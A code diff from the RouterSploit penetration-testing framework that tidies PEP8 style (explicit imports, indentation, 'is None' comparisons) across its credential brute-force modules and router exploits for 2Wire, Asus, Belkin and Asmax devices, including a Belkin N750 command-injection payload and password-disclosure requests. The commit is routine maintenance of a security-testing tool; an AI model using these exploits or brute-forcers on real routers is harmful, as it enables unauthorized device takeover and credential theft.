fixed some PEP8 errors like mixed tabs and spaces, import *, etc

routersploit/exceptions.py

 class RoutersploitException(Exception):
-    pass
+    pass
\ No newline at end of file

routersploit/interpreter.py

@@ -226,7 +226,7 @@ class RoutersploitInterpreter(BaseInterpreter):
         if self.current_module:
             try:
                 return self.module_prompt_template.format(host=self.prompt_hostname, module=self.module_metadata['name'])
-            except (AttributeError, KeyError) as e:
+            except (AttributeError, KeyError):
                 return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
         else:
             return self.raw_prompt_template.format(host=self.prompt_hostname)
@@ -362,7 +362,7 @@ class RoutersploitInterpreter(BaseInterpreter):
             return sub_commands
 
     @utils.module_required
-    def command_check(self,  *args, **kwargs):
+    def command_check(self, *args, **kwargs):
         try:
             result = self.current_module.check()
         except:

routersploit/modules/creds/ftp_bruteforce.py

@@ -3,7 +3,15 @@ import ftplib
 import socket
 import itertools
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -14,8 +22,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'FTP Bruteforce',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -99,6 +107,6 @@ class Exploit(exploits.Exploit):
                 except:
                     print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
 
-                ftp.close() 
+                ftp.close()
 
         print_status(name, 'process is terminated.')

routersploit/modules/creds/ftp_default.py

@@ -2,7 +2,15 @@ import threading
 import ftplib
 import socket
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'FTP Default Creds',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -65,7 +73,7 @@ class Exploit(exploits.Exploit):
             try:
                 line = data.next().split(":")
                 user = line[0].strip()
-                password = line[1].strip()    
+                password = line[1].strip()
             except StopIteration:
                 break
             else:
@@ -81,7 +89,7 @@ class Exploit(exploits.Exploit):
                         if retries > 2:
                             print_error("Too much connection problems. Quiting...")
                             return
-                
+
                 try:
                     ftp.login(user, password)
 

routersploit/modules/creds/http_basic_bruteforce.py

@@ -2,7 +2,16 @@ import threading
 import requests
 import itertools
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'HTTP Basic Bruteforce',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -38,7 +47,7 @@ class Exploit(exploits.Exploit):
             print_error("Invalid URL format: %s" % url)
             return
         except requests.exceptions.ConnectionError:
-	    print_error("Connection error: %s" % url)
+            print_error("Connection error: %s" % url)
             return
 
         if r.status_code != 401:

routersploit/modules/creds/http_basic_default.py

 import threading
 import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,8 +21,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'HTTP Basic Default Creds',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
             print_error("Invalid URL format: %s" % url)
             return
         except requests.exceptions.ConnectionError:
-	    print_error("Connection error: %s" % url)
+            print_error("Connection error: %s" % url)
             return
 
         if r.status_code != 401:

routersploit/modules/creds/http_form_bruteforce.py

@@ -3,7 +3,16 @@ import requests
 import itertools
 from bs4 import BeautifulSoup
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -14,8 +23,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'HTTP Form Bruteforce',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -37,7 +46,7 @@ class Exploit(exploits.Exploit):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
 
         try:
-            r = requests.get(url)
+            requests.get(url)
         except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
             print_error("Invalid URL format: %s" % url)
             return
@@ -45,11 +54,11 @@ class Exploit(exploits.Exploit):
             print_error("Connection error: %s" % url)
             return
 
-        # authentication type 
+        # authentication type
         if self.form == 'auto':
             self.data = self.detect_form()
 
-            if self.data == None:
+            if self.data is None:
                 print_error("Could not detect form")
                 return
         else:
@@ -105,10 +114,10 @@ class Exploit(exploits.Exploit):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
         r = requests.get(url)
         soup = BeautifulSoup(r.text, "lxml")
-        
+
         form = soup.find("form")
 
-        if form == None:
+        if form is None:
             return None
 
         if len(form) > 0:
@@ -116,21 +125,21 @@ class Exploit(exploits.Exploit):
             for inp in form.findAll("input"):
                 if 'name' in inp.attrs.keys():
                     if inp.attrs['name'].lower() in ["username", "user", "login"]:
-                        res.append(inp.attrs['name']+"="+"{{USER}}")
+                        res.append(inp.attrs['name'] + "=" + "{{USER}}")
                     elif inp.attrs['name'].lower() in ["password", "pass"]:
-                        res.append(inp.attrs['name']+"="+"{{PASS}}")
+                        res.append(inp.attrs['name'] + "=" + "{{PASS}}")
                     else:
                         if 'value' in inp.attrs.keys():
-                            res.append(inp.attrs['name']+"="+inp.attrs['value'])
+                            res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
                         else:
-                            res.append(inp.attrs['name']+"=")
+                            res.append(inp.attrs['name'] + "=")
         return '&'.join(res)
 
     def target_function(self, running, data):
         name = threading.current_thread().name
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        
+
         print_status(name, 'process is starting...')
 
         while running.is_set():
@@ -153,4 +162,3 @@ class Exploit(exploits.Exploit):
                 break
 
         print_status(name, 'process is terminated.')
-

routersploit/modules/creds/http_form_default.py

@@ -2,7 +2,16 @@ import threading
 import requests
 from bs4 import BeautifulSoup
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'HTTP Form Default Creds',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
 
         try:
-            r = requests.get(url)
+            requests.get(url)
         except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
             print_error("Invalid URL format: %s" % url)
             return
@@ -43,11 +52,11 @@ class Exploit(exploits.Exploit):
             print_error("Connection error: %s" % url)
             return
 
-        # authentication type 
+        # authentication type
         if self.form == 'auto':
             self.data = self.detect_form()
 
-            if self.data == None:
+            if self.data is None:
                 print_error("Could not detect form")
                 return
         else:
@@ -98,10 +107,10 @@ class Exploit(exploits.Exploit):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
         r = requests.get(url)
         soup = BeautifulSoup(r.text, "lxml")
-        
+
         form = soup.find("form")
 
-        if form == None:
+        if form is None:
             return None
 
         if len(form) > 0:
@@ -109,21 +118,21 @@ class Exploit(exploits.Exploit):
             for inp in form.findAll("input"):
                 if 'name' in inp.attrs.keys():
                     if inp.attrs['name'].lower() in ["username", "user", "login"]:
-                        res.append(inp.attrs['name']+"="+"{{USER}}")
+                        res.append(inp.attrs['name'] + "=" + "{{USER}}")
                     elif inp.attrs['name'].lower() in ["password", "pass"]:
-                        res.append(inp.attrs['name']+"="+"{{PASS}}")
+                        res.append(inp.attrs['name'] + "=" + "{{PASS}}")
                     else:
                         if 'value' in inp.attrs.keys():
-                            res.append(inp.attrs['name']+"="+inp.attrs['value'])
+                            res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
                         else:
-                            res.append(inp.attrs['name']+"=")
+                            res.append(inp.attrs['name'] + "=")
         return '&'.join(res)
 
     def target_function(self, running, data):
         name = threading.current_thread().name
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        
+
         print_status(name, 'process is starting...')
 
         while running.is_set():
@@ -146,4 +155,3 @@ class Exploit(exploits.Exploit):
                 break
 
         print_status(name, 'process is terminated.')
-

routersploit/modules/creds/snmp_bruteforce.py

 import threading
-import itertools
 import netsnmp
-import socket
 
 from routersploit.utils import print_status, print_success, print_error, print_table, LockedIterator
 from routersploit import exploits
@@ -15,7 +13,7 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'SNMP Bruteforce',
-        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
+        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -45,7 +43,7 @@ class Exploit(exploits.Exploit):
             print_table(headers, *self.strings)
         else:
             print_error("Valid community strings not found")
-            
+
     def target_function(self, running, data):
         name = threading.current_thread().name
         address = "{}:{}".format(self.target, self.port)
@@ -57,9 +55,9 @@ class Exploit(exploits.Exploit):
                 string = data.next().strip()
 
                 bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
-                res = netsnmp.snmpget(bindvariable, Version = 1, DestHost = address, Community=string)
+                res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
 
-                if res[0] != None:
+                if res[0] is not None:
                     running.clear()
                     print_success("{}: Valid community string found!".format(name), string)
                     self.strings.append(tuple([string]))

routersploit/modules/creds/ssh_bruteforce.py

@@ -3,7 +3,15 @@ import itertools
 import socket
 import paramiko
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,7 +21,7 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'SSH Bruteforce',
-        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
+        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -60,7 +68,7 @@ class Exploit(exploits.Exploit):
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
-            
+
     def target_function(self, running, data):
         name = threading.current_thread().name
         ssh = paramiko.SSHClient()

routersploit/modules/creds/ssh_default.py

@@ -2,7 +2,15 @@ import threading
 import paramiko
 import socket
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'SSH Default Creds',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -39,12 +47,12 @@ class Exploit(exploits.Exploit):
             pass
 
         ssh.close()
-        
+
         if self.defaults.startswith('file://'):
             defaults = open(self.defaults[7:], 'r')
         else:
             defaults = [self.defaults]
-        
+
         collection = LockedIterator(defaults)
         self.run_threads(self.threads, self.target_function, collection)
 
@@ -72,7 +80,7 @@ class Exploit(exploits.Exploit):
                 break
             except paramiko.ssh_exception.SSHException as err:
                 ssh.close()
-                print_error(name, err,"Username: '{}' Password: '{}'".format(user, password))
+                print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
             else:
                 running.clear()
                 print_success("{}: Authentication succeed!".format(name), user, password)

routersploit/modules/creds/telnet_bruteforce.py

@@ -2,7 +2,15 @@ import threading
 import itertools
 import telnetlib
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,7 +20,7 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Telnet Bruteforce',
-        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
+        'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -55,7 +63,7 @@ class Exploit(exploits.Exploit):
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
-            
+
     def target_function(self, running, data):
         name = threading.current_thread().name
 
@@ -79,13 +87,13 @@ class Exploit(exploits.Exploit):
                         tn.write(password + "\r\n")
                         tn.write("\r\n")
 
-                        (i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
+                        (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
                         tn.close()
 
                         if i != -1:
                             print_error(name, "Username: '{}' Password: '{}'".format(user, password))
                         else:
-                            if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
+                            if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500:  # big banner e.g. mikrotik
                                 running.clear()
                                 print_success("{}: Authentication succeed!".format(name), user, password)
                                 self.credentials.append((user, password))
@@ -100,5 +108,4 @@ class Exploit(exploits.Exploit):
                             return
                         continue
 
-
         print_status(name, 'thread is terminated.')

routersploit/modules/creds/telnet_default.py

 import threading
 import telnetlib
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    wordlists,
+    print_status,
+    print_error,
+    LockedIterator,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,8 +20,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'Telnet Default Creds',
         'author': [
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
-         ]
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
+        ]
     }
 
     target = exploits.Option('', 'Target IP address')
@@ -40,7 +48,7 @@ class Exploit(exploits.Exploit):
             defaults = open(self.defaults[7:], 'r')
         else:
             defaults = [self.defaults]
-        
+
         collection = LockedIterator(defaults)
         self.run_threads(self.threads, self.target_function, collection)
 
@@ -73,13 +81,13 @@ class Exploit(exploits.Exploit):
                         tn.write(password + "\r\n")
                         tn.write("\r\n")
 
-                        (i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
+                        (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
                         tn.close()
 
                         if i != -1:
                             print_error(name, "Username: '{}' Password: '{}'".format(user, password))
                         else:
-                            if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
+                            if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500:  # big banner e.g. mikrotik
                                 running.clear()
                                 print_success("{}: Authentication succeed!".format(name), user, password)
                                 self.credentials.append((user, password))
@@ -92,6 +100,6 @@ class Exploit(exploits.Exploit):
                         if retries > 2:
                             print_error("Too much connection problems. Quiting...")
                             return
-                        continue 
+                        continue
 
         print_status(name, 'process is terminated.')

routersploit/modules/exploits/2wire/gateway_auth_bypass.py

 import requests
-import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,21 +17,21 @@ class Exploit(exploits.Exploit):
         'name': '2Wire Gateway Auth Bypass',
         'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. If the target is vulnerable link to bypass authentication is provided.',
         'authors': [
-            'bugz', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
-         ],
+            'bugz',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://www.exploit-db.com/exploits/9459/',
-         ],
-         'targets': [
+        ],
+        'targets': [
             '2Wire 2701HGV-W',
             '2Wire 3800HGV-B',
             '2Wire 3801HGV',
-         ] 
+        ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(80, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(80, 'Target port')  # default port
 
     def run(self):
         if self.check():
@@ -40,7 +44,7 @@ class Exploit(exploits.Exploit):
     def check(self):
         # check if it is valid target
         url = sanitize_url("{}:{}/".format(self.target, self.port))
-        
+
         try:
             r = requests.get(url, verify=False)
             res = r.text
@@ -48,8 +52,8 @@ class Exploit(exploits.Exploit):
             return None
 
         if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
-			return False
-	 	
+            return False
+
         # checking if authentication can be baypassed
         url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
         try:
@@ -57,9 +61,8 @@ class Exploit(exploits.Exploit):
             res = r.text
         except:
             return None
-            
+
         if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
-            return True # target vulnerable
+            return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_status,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -60,7 +67,6 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
 
@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
             return True   # target vulnerable
-        
-        return False  # target not vulnerable
 
+        return False  # target not vulnerable

routersploit/modules/exploits/asmax/ar_804_gu_rce.py

 import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -11,8 +17,8 @@ class Exploit(exploits.Exploit):
     __info__ = {
         'name': 'Asmax AR 804 RCE',
         'authors': [
-             'Michal Sajdak <michal.sajdak@securitum.com>', # vulnerability discovery
-             'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
+             'Michal Sajdak <michal.sajdak@securitum.com>',  # vulnerability discovery
+             'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
         ],
         'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
         'references': [
@@ -27,7 +33,7 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(80, 'Target Port')
 
     def run(self):
-        if self.check() == True:
+        if self.check() is True:
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             self.command_loop()
@@ -65,4 +71,3 @@ class Exploit(exploits.Exploit):
             return True
 
         return False
-

routersploit/modules/exploits/asus/rt_n16_password_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,25 +19,25 @@ class Exploit(exploits.Exploit):
         'name': 'Asus RT-N16 Password Disclosure',
         'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.',
         'authors': [
-            'Harry Sintonen', # vulnerability discovery
-            'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
-         ],
+            'Harry Sintonen',  # vulnerability discovery
+            'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module
+        ],
         'references': [
             'https://sintonen.fi/advisories/asus-router-auth-bypass.txt'
-         ],
-         'targets': [
+        ],
+        'targets': [
             'ASUS RT-N10U, firmware 3.0.0.4.374_168',
             'ASUS RT-N56U, firmware 3.0.0.4.374_979',
             'ASUS DSL-N55U, firmware 3.0.0.4.374_1397',
             'ASUS RT-AC66U, firmware 3.0.0.4.374_2050',
             'ASUS RT-N15U, firmware 3.0.0.4.374_16',
             'ASUS RT-N53, firmware 3.0.0.4.374_311',
-         ]
-         
+        ]
+
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
-    port = exploits.Option(8080, 'Target port') # default port
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(8080, 'Target port')  # default port
 
     def run(self):
         url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
@@ -43,11 +49,11 @@ class Exploit(exploits.Exploit):
             print_error("Invalid URL format: %s" % url)
             return
         except requests.exceptions.ConnectionError:
-	    print_error("Connection error: %s" % url)
+            print_error("Connection error: %s" % url)
             return
 
         creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
-        
+
         if len(creds):
             c = [("admin", creds[0])]
             print_success("Credentials found!")
@@ -56,7 +62,6 @@ class Exploit(exploits.Exploit):
         else:
             print_error("Credentials could not be found")
 
-
     def check(self):
         url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
 
@@ -64,11 +69,10 @@ class Exploit(exploits.Exploit):
             r = requests.get(url)
             res = r.text
         except:
-            return None # could not be verified
+            return None  # could not be verified
 
         creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
         if len(creds):
-            return True # target vulnerable
+            return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/belkin/g_n150_password_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,9 +19,9 @@ class Exploit(exploits.Exploit):
         'name': 'Belkin G & N150 Password Disclosure',
         'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format',
         'authors': [
-            'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
-            'Avinash Tangirala', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Aodrulez <f3arm3d3ar[at]gmail.com>',  # vulnerability discovery
+            'Avinash Tangirala',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765',
@@ -58,12 +64,11 @@ class Exploit(exploits.Exploit):
             r = requests.get(url, verify=False)
             res = r.text
         except:
-            return None # could not verify
+            return None  # could not verify
 
         val = re.findall('password = "(.+?)"', res)
 
         if len(val):
-            return True # target vulnerable
-
-        return False # target is not vulnerable
+            return True  # target vulnerable
 
+        return False  # target is not vulnerable

routersploit/modules/exploits/belkin/g_plus_info_disclosure.py

 import requests
 import re
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_table,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
         'name': 'Belkin G Info Disclosure',
         'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
         'authors': [
-            'DarkFig', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'DarkFig',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403',
@@ -38,7 +44,15 @@ class Exploit(exploits.Exploit):
             print_error("Connection error: %s" % url)
             return
 
-        var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
+        var = ['pppoe_username',
+                'pppoe_password',
+                'wl0_pskkey',
+                'wl0_key1',
+                'mradius_password',
+                'mradius_secret',
+                'httpd_password',
+                'http_passwd',
+                'pppoe_passwd']
 
         data = []
         for v in var:
@@ -63,12 +77,19 @@ class Exploit(exploits.Exploit):
             r = requests.get(url, verify=False)
             res = r.text
         except:
-            return None # could not verify
-
-        var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
+            return None  # could not verify
+
+        var = ['pppoe_username',
+                'pppoe_password',
+                'wl0_pskkey',
+                'wl0_key1',
+                'mradius_password',
+                'mradius_secret',
+                'httpd_password',
+                'http_passwd',
+                'pppoe_passwd']
 
         if any(map(lambda x: x in res, var)):
             return True   # target vulnerable
 
-        return False # target is not vulnerable
-
+        return False  # target is not vulnerable

routersploit/modules/exploits/belkin/n150_path_traversal.py

 import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,9 +17,9 @@ class Exploit(exploits.Exploit):
         'name': 'Belkin N150 Path Traversal',
         'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.',
         'authors': [
-            'Aditya Lad', # vulnerability discovery
-            'Rahul Pratap Singh', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Aditya Lad',  # vulnerability discovery
+            'Rahul Pratap Singh',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'https://www.exploit-db.com/exploits/38488/',
@@ -55,10 +60,9 @@ class Exploit(exploits.Exploit):
             r = requests.get(url, verify=False)
             res = r.text
         except:
-            return None # could not verify
+            return None  # could not verify
 
         if "root:" in res:
-            return True # target vulnerable
-
-        return False # target is not vulnerable
+            return True  # target vulnerable
 
+        return False  # target is not vulnerable

routersploit/modules/exploits/belkin/n750_rce.py

 import requests
 
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    sanitize_url,
+)
 
 
 class Exploit(exploits.Exploit):
@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
         'name': 'Belkin N750 RCE',
         'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.',
         'authors': [
-            'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
+            'Marco Vaz <mv[at]integrity.pt>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
         ],
         'references': [
             'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635',
@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(80, 'Target Port')
 
     def run(self):
-        if self.check() == True:
+        if self.check() is True:
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             self.command_loop()
@@ -44,7 +50,7 @@ class Exploit(exploits.Exploit):
     def execute(self, cmd):
         url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = "GO=&jump="+"A"*1379 + ";{};&ps=\n\n".format(cmd)
+        data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
 
         try:
             r = requests.post(url, headers=headers, data=data, verify=False)
@@ -60,16 +66,15 @@ class Exploit(exploits.Exploit):
         # todo random mark
         url = sanitize_url("{}:{}/login.cgi".format(self.target, self.port))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = "GO=&jump="+"A"*1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
+        data = "GO=&jump=" + "A" * 1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
 
         try:
             r = requests.post(url, headers=headers, data=data, verify=False)
             res = r.text
         except:
-            return None # could not verify
+            return None  # could not verify
 
         if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
-            return True # target vulnerable
-
-        return False # target is not vulnerable
+            return True  # target vulnerable
 
